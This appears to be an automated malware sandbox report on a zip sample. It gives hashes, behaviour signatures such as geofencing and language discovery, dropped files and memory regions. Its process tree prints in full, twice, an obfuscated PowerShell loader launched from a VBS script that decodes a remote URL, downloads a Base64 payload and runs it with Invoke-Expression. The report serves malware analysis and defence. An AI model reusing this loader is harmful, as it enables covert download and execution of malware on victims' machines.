Analysis

  • max time kernel
    452s
  • max time network
    423s
  • platform
    windows10-ltsc 2021_x64
  • resource
    win10ltsc2021-20241023-en
  • resource tags

    arch:x64arch:x86image:win10ltsc2021-20241023-enlocale:en-usos:windows10-ltsc 2021-x64system
  • submitted
    13-11-2024 21:40

General

  • Target

    374771.zip

  • Size

    291KB

  • MD5

    12a63f1a3c0bba69803902c8ed103aca

  • SHA1

    a92058010f800b898027078597c5a7d50c63af8a

  • SHA256

    36fa037ca66a284e86ee251d412e5e95c4c9c5d32d225722669968246dd4e180

  • SHA512

    4ed9faae8c051d751b61b6ef5f4824a203143dc4c92da1131b821f7f676a75fb5e47ced80f4739bc9c23ac704e5915380a1d79cdf03c25e3cfa2174163ea04b6

  • SSDEEP

    6144:OdRxw0G9Ss4OUMZvPqBdwa0GYO64IXJqwdNNkHcD+ue:uG4SvPqDz6vXJtdNNk/

Score
7/10

Malware Config

Signatures

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files\7-Zip\7zFM.exe
    "C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\374771.zip"
    1⤵
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    PID:2616
  • C:\Windows\System32\rundll32.exe
    C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
    1⤵
      PID:2880
    • C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\B3.vbs"
      1⤵
      • Checks computer location settings
      • Suspicious use of WriteProcessMemory
      PID:5068
      • C:\Windows\System32\ping.exe
        ping gormezl_6777.6777.6777.677e
        2⤵
        • System Network Configuration Discovery: Internet Connection Discovery
        • Runs ping.exe
        PID:1988
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Stelography Boligministerielt Surterhvervet Polenkas #>;$Genforeningerne='Brasilianske';<#Decoloriser Quatrains dksmands Rentabelt #>;$Stvregne=$Orlos+$host.UI; function Udgangstilladelsernes($Lupulus){If ($Stvregne) {$setaria++;}$Revest=$Velkomstens74+$Lupulus.'Length'-$setaria; for( $Kropsvisiteret=4;$Kropsvisiteret -lt $Revest;$Kropsvisiteret+=5){$Spoilage=$Kropsvisiteret;$Salvelsesfuldest+=$Lupulus[$Kropsvisiteret];$Prototraitor='Kronvildtjagterne';}$Salvelsesfuldest;}function Skilleliniens($Knothead){ & ($Toilettaskens) ($Knothead);}$Tastetryk=Udgangstilladelsernes 'guttM ndsoUn uzPoliiCanal I clvotaaDavi/ Pen ';$Tastetryk+=Udgangstilladelsernes 'Quar5Skyd.mine0Love Ski.(Li nWFejliMul nFabrdudklo NanwF.ans a,a ProcNB,geT,lie Stem1Udru0 Dr,.Roug0Raci;Phra OffiWCensiRiddnNatu6Oakl4Be i;Ne.r FenaxOver6Ea t4Ur n;Nume UrinrGyptvFili:sta,1 Eff3Dest1Clee.Disa0Tred)Fi a HandG noneYellcJustk Siso,rep/Frod2 Sto0H.ms1Stil0Gest0 P.o1Cert0Wi t1Buri DyreFSelviDubbr G,ueH,mpf tr oUmorxL,du/Defl1conv3Post1N ws.Sikk0 Bog ';$Cellerne=Udgangstilladelsernes 'EmbrUO bys OppeQuarrErog-surfA ukkgBro E ivsN fortigna ';$Konstruktivt=Udgangstilladelsernes 'Gru.haf,at ArttB depKachsHoo,:Flit/Be.a/ GamsBatiyH lvnDeuteMa ipFinu.Fl trTohaoBef./SkosLQuacySpecsActib trgaSandd vov. PaupStr sS,anpSkij ';$Kropsvisiteretndarbejde97=Udgangstilladelsernes 'Olde>Gang ';$Toilettaskens=Udgangstilladelsernes ' ympI .ree Sa.x Raf ';$Lykkejgers='Spendynr';$Proconscriptive='\Udviklingsegnes.sep';Skilleliniens (Udgangstilladelsernes ' npa$Fuyeg Cu le,acoNaivbFinaAAkvaLTr,n:O.lltCytoAIdeamFra B Ud UUn,rRChicSBlse=Ozon$ kreSkanNP lwvGlas: staA St PWordP La D AliASn.wt P.laU,fr+trau$frynpGnisr ,enoAppecDuelO.enenKgeusF.rhC r nrOarliclump FleTswo iLym.vRefeETysk ');Skilleliniens (Udgangstilladelsernes 'Arbe$Forbg PenlHandoMinuBFackaLa sL Bil: UnmKgardOIndod eneELan k aresA skEK.ogrOml.=Bajo$Kl pknarcoCraiNSy gSChert PrerUnusUPr.lKPrint s aI ealvsammTAkti.AnidsChe,pThyml N nIOpe.TTrun(Hoo $svinkUn.orChecO no pTilfS F,rVSvinifadeS .ryiBeriTStroeAntiR .elEnoncTskifN FerDForpa.ildRGipsBSan eDampj ForDMelaEJor 9Disi7Insi)Star ');Skilleliniens (Udgangstilladelsernes ' Nov[,ufonfjldE RovtEjen.SextshunkE Marr Genv .kki C,nCDi heBronP,kspoGadiIFrowNtndit,algMInf AEkspNVeneABallg UngeFastr Gre]Wa.r:U,co: molSApplE KogC ,unuAnteRReaniDm,iT CarYKrafp E.er nheoGardtLauroTahacCivioNighLLump Rang=Outb ,usk[ StaN A.hE Ovet Wif.GcelSFormeBondc,andUS ilRArtoI ukkTToroYParoPdolorSubpOPreitcheeoFrieCSrskOLserl OddTunfoYD ospSkypeEksp]Sg f: amm:Dry,tPomeLaddos nab1Dila2 le ');$Konstruktivt=$Kodekser[0];$Slbemaalsflyvningens=(Udgangstilladelsernes 'Buat$,utwgVineLLs lO ,aaBMuriaGravLT.ia:up om TusEDrabsNondOPoluSDat.TRoofeSperTGarrHVir,i racuEmpimBol,= OstNAndre K sW Da -S orODefebNonpj phEFedeC N dTpara BadeSPermYLmleS enotfiltEPretmHj i. F rnWin eMar.T Rec. llewPosteAgnobKarmcudtolPl ai eae ,ldNAf,itHype ');Skilleliniens ($Slbemaalsflyvningens);Skilleliniens (Udgangstilladelsernes 'Indb$UntoMInhueSlags AfvoN das clatCh.pe Glut Indh lloi AkkuIn emIntr.TrolHGrateLeukaNvn,d aadeFjolrKnurs,oti[ els$Rep,C rane,alelForklErg eSvejrSrgenHyp eStam]Nico=Br s$PligTUdr aHvedsJ.rdtMaadeor rtConcrUnafyT iwkHenr ');$Egidias=Udgangstilladelsernes 'Fjer$ WheMSynteJo vsInosoZinasReast SyseCap.t Fdeh Rrei.nteuCocimcolo.Hun.DVocio endw entnOystlHelhoKommaskged atrFExaniOrphlJinge Po,(Acli$SnreK S roLoitnPernsBe,zt DisrSputuEddikEbb,tPolli HjevLuftt,kit, omb$ PleS TreuMisbbDrukcFallaGe,en FoodHen iKaradId.nl M syRaba)Kom ';$Subcandidly=$Tamburs;Skilleliniens (Udgangstilladelsernes 'Si s$GlobGVintL ecooParaB SelAS.enlHalv: FrucI oleRampME,asBBib aPhloLTossoWaxeeD gfTL anSFibr=Unfi(TidstIdeaeRevns asktLev -Gar P ,ida.dreTUrolH da Semi$PinsSKlupuElecBRur.cInteaSam n ndsdsl mIAkusD ,hol emiYTele)I fa ');while (!$Cembaloets) {Skilleliniens (Udgangstilladelsernes ' Jua$ H pgStralWitooC.rkbK,lvaPesslFo d:PrinSvi etTilboTaabcIntekVejpaO sld Re,iVir n.issg Und= A,t$SylttflokrOut uRi,eeCoul ') ;Skilleliniens $Egidias;Skilleliniens (Udgangstilladelsernes 'Bryas ocTRefeAJourRunmatApp,-SecuSSubllPoi EPreeEMonkPRenn A ge4Chia ');Skilleliniens (Udgangstilladelsernes 'Noni$a nuGU deLK,ttOhjfrbJar,A .reLRaad:kersCNjereRab MPre bStarARentlFailoRevaE D,gTAfviSthra=T an(Sigtt.iscE Ha S.ubwt Mo,-T mipSta,AUganTEntrhUnfo Sm $SvmmSBibeu GrnB crCHi tAPr cn jasdU.coiSimeDSkriLpappY ild)Nulp ') ;Skilleliniens (Udgangstilladelsernes 'Twan$HovegAstrlBiblohjreBUdl.AHallL agk:ServT geoMng,X CalI S oFbur YSulp2Euka2plun1 tra=Fje $FragGUnziLOveroFittBLagea Nv l A,f: enN M riMycotSe.spIndkiOndsCHa.hkKno.EEn idEmbi+Skin+Sa l%Inds$SphikBsnioSciadTincEUn iKBespSTjrpeE,isrCoif.AdmiC enloRa.kuIvaonPensTLide ') ;$Konstruktivt=$Kodekser[$Toxify221];}$Solidare=303621;$Polyadelph=30134;Skilleliniens (Udgangstilladelsernes 'Twa,$Di.gGStreLbyraoblombbr dASk,dLSalg:ListrFdebe aprgunvinHypoSAn,lk PusaCalibHjersBesgppejkRTun iCaconKartCV ctI perPstanp BenEUnflRRhinsPalm E t=Genn dieGIndrER ftTAb f-D scCLgeroJok NLor T ,edE OvenPartTAnon Pas$TnkesSkabU o,ebO,erc utoaBillN R vDNeigiServD Erll U.vyLuti ');Skilleliniens (Udgangstilladelsernes 'Malk$HavngPrislTessoPelvb IsoaHydrlOrdm:.teePlo ieAwaraSkifcFilsh blilFlasiM nikMacre Smi Lo,e=E jo Detr[Frg SFlngyRespsEnertUmbieE lym on.Se rCClamoDiscn L,avHu teHunkr PertAcco] ,ve:In,e:SproF uborSkyjo,ohemI agBRaadaSynasBroeeForl6Lage4Con SK ngt Kl r KamiCampnPlagg Pa (reol$EkspRLorieOutcg IgnnFo ksReagkKrimaOd nbParasAdreplnrerNonciGrannF.rac Heri arlpWindpTreveSen rNybysDyst)Pana ');Skilleliniens (Udgangstilladelsernes 'Sana$parcGStedLRevlOLgeub B aa AfkL Ket:F akTCarbIT anlLives isckUdvlRmycee.andRspris Bl ABlo.k ApiS Vole unnpy.rE UniSDoms7Angl7Unde nonc= Fru Pedu[MortS NriYInv SRaveTTin.EHun mBead.AmenTBecheE ogxJudet Gha. ExaEEp,xN sweCSoldOAbenDFlodiDyrtNUni.GIndd]S ep:Myos:NonhA B lSSistCDesaIToniI,ale. Bl G HelE MamtSynesSha.t,ovgR Ty.i StenRin gUnsy(Htbl$MeatPHeteeMet ADer CUsarhEmb L Thoi rioKHldne Ind) Tri ');Skilleliniens (Udgangstilladelsernes 'Squi$TaxiGUdd lKommoEntrBOperAKasklParf:Jun u ornMinuT imiUE emFK ostBandeBuredMe.a= la$ BefTFastIRewaLsyndsPillkMashrAmt eTi.frHavesSpeaA T ikOverSHv,dEKritnRo kE fssSe,i7Dech7Caus.N,nnsDan UFiskB KotsRg ot ndRultriUbalN.araG Whi( al$ HagsUdtrointelUgesi TrsDUndeaTranrbl ee Phe, Bur$Ark.pPit OQu flIndkY Palalownd .uoeM sslKastPB seHOp r)Sup. ');Skilleliniens $Untufted;"
        2⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3972
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Stelography Boligministerielt Surterhvervet Polenkas #>;$Genforeningerne='Brasilianske';<#Decoloriser Quatrains dksmands Rentabelt #>;$Stvregne=$Orlos+$host.UI; function Udgangstilladelsernes($Lupulus){If ($Stvregne) {$setaria++;}$Revest=$Velkomstens74+$Lupulus.'Length'-$setaria; for( $Kropsvisiteret=4;$Kropsvisiteret -lt $Revest;$Kropsvisiteret+=5){$Spoilage=$Kropsvisiteret;$Salvelsesfuldest+=$Lupulus[$Kropsvisiteret];$Prototraitor='Kronvildtjagterne';}$Salvelsesfuldest;}function Skilleliniens($Knothead){ & ($Toilettaskens) ($Knothead);}$Tastetryk=Udgangstilladelsernes 'guttM ndsoUn uzPoliiCanal I clvotaaDavi/ Pen ';$Tastetryk+=Udgangstilladelsernes 'Quar5Skyd.mine0Love Ski.(Li nWFejliMul nFabrdudklo NanwF.ans a,a ProcNB,geT,lie Stem1Udru0 Dr,.Roug0Raci;Phra OffiWCensiRiddnNatu6Oakl4Be i;Ne.r FenaxOver6Ea t4Ur n;Nume UrinrGyptvFili:sta,1 Eff3Dest1Clee.Disa0Tred)Fi a HandG noneYellcJustk Siso,rep/Frod2 Sto0H.ms1Stil0Gest0 P.o1Cert0Wi t1Buri DyreFSelviDubbr G,ueH,mpf tr oUmorxL,du/Defl1conv3Post1N ws.Sikk0 Bog ';$Cellerne=Udgangstilladelsernes 'EmbrUO bys OppeQuarrErog-surfA ukkgBro E ivsN fortigna ';$Konstruktivt=Udgangstilladelsernes 'Gru.haf,at ArttB depKachsHoo,:Flit/Be.a/ GamsBatiyH lvnDeuteMa ipFinu.Fl trTohaoBef./SkosLQuacySpecsActib trgaSandd vov. PaupStr sS,anpSkij ';$Kropsvisiteretndarbejde97=Udgangstilladelsernes 'Olde>Gang ';$Toilettaskens=Udgangstilladelsernes ' ympI .ree Sa.x Raf ';$Lykkejgers='Spendynr';$Proconscriptive='\Udviklingsegnes.sep';Skilleliniens (Udgangstilladelsernes ' npa$Fuyeg Cu le,acoNaivbFinaAAkvaLTr,n:O.lltCytoAIdeamFra B Ud UUn,rRChicSBlse=Ozon$ kreSkanNP lwvGlas: staA St PWordP La D AliASn.wt P.laU,fr+trau$frynpGnisr ,enoAppecDuelO.enenKgeusF.rhC r nrOarliclump FleTswo iLym.vRefeETysk ');Skilleliniens (Udgangstilladelsernes 'Arbe$Forbg PenlHandoMinuBFackaLa sL Bil: UnmKgardOIndod eneELan k aresA skEK.ogrOml.=Bajo$Kl pknarcoCraiNSy gSChert PrerUnusUPr.lKPrint s aI ealvsammTAkti.AnidsChe,pThyml N nIOpe.TTrun(Hoo $svinkUn.orChecO no pTilfS F,rVSvinifadeS .ryiBeriTStroeAntiR .elEnoncTskifN FerDForpa.ildRGipsBSan eDampj ForDMelaEJor 9Disi7Insi)Star ');Skilleliniens (Udgangstilladelsernes ' Nov[,ufonfjldE RovtEjen.SextshunkE Marr Genv .kki C,nCDi heBronP,kspoGadiIFrowNtndit,algMInf AEkspNVeneABallg UngeFastr Gre]Wa.r:U,co: molSApplE KogC ,unuAnteRReaniDm,iT CarYKrafp E.er nheoGardtLauroTahacCivioNighLLump Rang=Outb ,usk[ StaN A.hE Ovet Wif.GcelSFormeBondc,andUS ilRArtoI ukkTToroYParoPdolorSubpOPreitcheeoFrieCSrskOLserl OddTunfoYD ospSkypeEksp]Sg f: amm:Dry,tPomeLaddos nab1Dila2 le ');$Konstruktivt=$Kodekser[0];$Slbemaalsflyvningens=(Udgangstilladelsernes 'Buat$,utwgVineLLs lO ,aaBMuriaGravLT.ia:up om TusEDrabsNondOPoluSDat.TRoofeSperTGarrHVir,i racuEmpimBol,= OstNAndre K sW Da -S orODefebNonpj phEFedeC N dTpara BadeSPermYLmleS enotfiltEPretmHj i. F rnWin eMar.T Rec. llewPosteAgnobKarmcudtolPl ai eae ,ldNAf,itHype ');Skilleliniens ($Slbemaalsflyvningens);Skilleliniens (Udgangstilladelsernes 'Indb$UntoMInhueSlags AfvoN das clatCh.pe Glut Indh lloi AkkuIn emIntr.TrolHGrateLeukaNvn,d aadeFjolrKnurs,oti[ els$Rep,C rane,alelForklErg eSvejrSrgenHyp eStam]Nico=Br s$PligTUdr aHvedsJ.rdtMaadeor rtConcrUnafyT iwkHenr ');$Egidias=Udgangstilladelsernes 'Fjer$ WheMSynteJo vsInosoZinasReast SyseCap.t Fdeh Rrei.nteuCocimcolo.Hun.DVocio endw entnOystlHelhoKommaskged atrFExaniOrphlJinge Po,(Acli$SnreK S roLoitnPernsBe,zt DisrSputuEddikEbb,tPolli HjevLuftt,kit, omb$ PleS TreuMisbbDrukcFallaGe,en FoodHen iKaradId.nl M syRaba)Kom ';$Subcandidly=$Tamburs;Skilleliniens (Udgangstilladelsernes 'Si s$GlobGVintL ecooParaB SelAS.enlHalv: FrucI oleRampME,asBBib aPhloLTossoWaxeeD gfTL anSFibr=Unfi(TidstIdeaeRevns asktLev -Gar P ,ida.dreTUrolH da Semi$PinsSKlupuElecBRur.cInteaSam n ndsdsl mIAkusD ,hol emiYTele)I fa ');while (!$Cembaloets) {Skilleliniens (Udgangstilladelsernes ' Jua$ H pgStralWitooC.rkbK,lvaPesslFo d:PrinSvi etTilboTaabcIntekVejpaO sld Re,iVir n.issg Und= A,t$SylttflokrOut uRi,eeCoul ') ;Skilleliniens $Egidias;Skilleliniens (Udgangstilladelsernes 'Bryas ocTRefeAJourRunmatApp,-SecuSSubllPoi EPreeEMonkPRenn A ge4Chia ');Skilleliniens (Udgangstilladelsernes 'Noni$a nuGU deLK,ttOhjfrbJar,A .reLRaad:kersCNjereRab MPre bStarARentlFailoRevaE D,gTAfviSthra=T an(Sigtt.iscE Ha S.ubwt Mo,-T mipSta,AUganTEntrhUnfo Sm $SvmmSBibeu GrnB crCHi tAPr cn jasdU.coiSimeDSkriLpappY ild)Nulp ') ;Skilleliniens (Udgangstilladelsernes 'Twan$HovegAstrlBiblohjreBUdl.AHallL agk:ServT geoMng,X CalI S oFbur YSulp2Euka2plun1 tra=Fje $FragGUnziLOveroFittBLagea Nv l A,f: enN M riMycotSe.spIndkiOndsCHa.hkKno.EEn idEmbi+Skin+Sa l%Inds$SphikBsnioSciadTincEUn iKBespSTjrpeE,isrCoif.AdmiC enloRa.kuIvaonPensTLide ') ;$Konstruktivt=$Kodekser[$Toxify221];}$Solidare=303621;$Polyadelph=30134;Skilleliniens (Udgangstilladelsernes 'Twa,$Di.gGStreLbyraoblombbr dASk,dLSalg:ListrFdebe aprgunvinHypoSAn,lk PusaCalibHjersBesgppejkRTun iCaconKartCV ctI perPstanp BenEUnflRRhinsPalm E t=Genn dieGIndrER ftTAb f-D scCLgeroJok NLor T ,edE OvenPartTAnon Pas$TnkesSkabU o,ebO,erc utoaBillN R vDNeigiServD Erll U.vyLuti ');Skilleliniens (Udgangstilladelsernes 'Malk$HavngPrislTessoPelvb IsoaHydrlOrdm:.teePlo ieAwaraSkifcFilsh blilFlasiM nikMacre Smi Lo,e=E jo Detr[Frg SFlngyRespsEnertUmbieE lym on.Se rCClamoDiscn L,avHu teHunkr PertAcco] ,ve:In,e:SproF uborSkyjo,ohemI agBRaadaSynasBroeeForl6Lage4Con SK ngt Kl r KamiCampnPlagg Pa (reol$EkspRLorieOutcg IgnnFo ksReagkKrimaOd nbParasAdreplnrerNonciGrannF.rac Heri arlpWindpTreveSen rNybysDyst)Pana ');Skilleliniens (Udgangstilladelsernes 'Sana$parcGStedLRevlOLgeub B aa AfkL Ket:F akTCarbIT anlLives isckUdvlRmycee.andRspris Bl ABlo.k ApiS Vole unnpy.rE UniSDoms7Angl7Unde nonc= Fru Pedu[MortS NriYInv SRaveTTin.EHun mBead.AmenTBecheE ogxJudet Gha. ExaEEp,xN sweCSoldOAbenDFlodiDyrtNUni.GIndd]S ep:Myos:NonhA B lSSistCDesaIToniI,ale. Bl G HelE MamtSynesSha.t,ovgR Ty.i StenRin gUnsy(Htbl$MeatPHeteeMet ADer CUsarhEmb L Thoi rioKHldne Ind) Tri ');Skilleliniens (Udgangstilladelsernes 'Squi$TaxiGUdd lKommoEntrBOperAKasklParf:Jun u ornMinuT imiUE emFK ostBandeBuredMe.a= la$ BefTFastIRewaLsyndsPillkMashrAmt eTi.frHavesSpeaA T ikOverSHv,dEKritnRo kE fssSe,i7Dech7Caus.N,nnsDan UFiskB KotsRg ot ndRultriUbalN.araG Whi( al$ HagsUdtrointelUgesi TrsDUndeaTranrbl ee Phe, Bur$Ark.pPit OQu flIndkY Palalownd .uoeM sslKastPB seHOp r)Sup. ');Skilleliniens $Untufted;"
      1⤵
      • Command and Scripting Interpreter: PowerShell
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1676

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      1KB

      MD5

      68f1fd10d7d7b8885ed45d8451a89c9e

      SHA1

      358aef85c7599e6818a7ea28eedfe1670cf365b6

      SHA256

      99ba4a513afbe189d3e8ad82557ee210f0aa434d92c91e6319c0755a1a78d673

      SHA512

      a35c2b933fae8ef367b87f5c7b8c21328ef78f92dee86ecd5018bbfe46469357b6a4c7927e8cdfb83a094f687e47fb4f9843252372b70e1a8fec78ab679dea19

    • C:\Users\Admin\AppData\Local\Temp\B3.vbs

      Filesize

      29KB

      MD5

      34bdef2ccee6d2e4c44bdde97100ee72

      SHA1

      c57af676764256de944346904ff895f1b6a6b649

      SHA256

      b3cbe99653473f02e9059a76d009e0e0e88763c8cb2a8e4ddf21b189761bd6f5

      SHA512

      8c0bb687c5566051dccf596e4532ad2da09729d7c7de603037bbcd97235dd7dc2d7ac3f526660640cae06d2f5772dc69d8bc8163d2516f07152f58a19bc3d05f

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_wtjcs3ns.r52.ps1

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • memory/1676-31-0x0000000006220000-0x0000000006577000-memory.dmp

      Filesize

      3.3MB

    • memory/1676-33-0x00000000066A0000-0x00000000066BE000-memory.dmp

      Filesize

      120KB

    • memory/1676-19-0x0000000005780000-0x00000000057A2000-memory.dmp

      Filesize

      136KB

    • memory/1676-26-0x00000000060B0000-0x0000000006116000-memory.dmp

      Filesize

      408KB

    • memory/1676-25-0x0000000005820000-0x0000000005886000-memory.dmp

      Filesize

      408KB

    • memory/1676-17-0x0000000002D20000-0x0000000002D56000-memory.dmp

      Filesize

      216KB

    • memory/1676-40-0x0000000009040000-0x000000000EDB7000-memory.dmp

      Filesize

      93.5MB

    • memory/1676-18-0x00000000058F0000-0x0000000005FBA000-memory.dmp

      Filesize

      6.8MB

    • memory/1676-34-0x0000000006750000-0x000000000679C000-memory.dmp

      Filesize

      304KB

    • memory/1676-35-0x0000000007E60000-0x00000000084DA000-memory.dmp

      Filesize

      6.5MB

    • memory/1676-36-0x0000000007800000-0x000000000781A000-memory.dmp

      Filesize

      104KB

    • memory/1676-37-0x0000000007960000-0x00000000079F6000-memory.dmp

      Filesize

      600KB

    • memory/1676-38-0x00000000078C0000-0x00000000078E2000-memory.dmp

      Filesize

      136KB

    • memory/1676-39-0x0000000008A90000-0x0000000009036000-memory.dmp

      Filesize

      5.6MB

    • memory/3972-10-0x0000029E89F70000-0x0000029E89F92000-memory.dmp

      Filesize

      136KB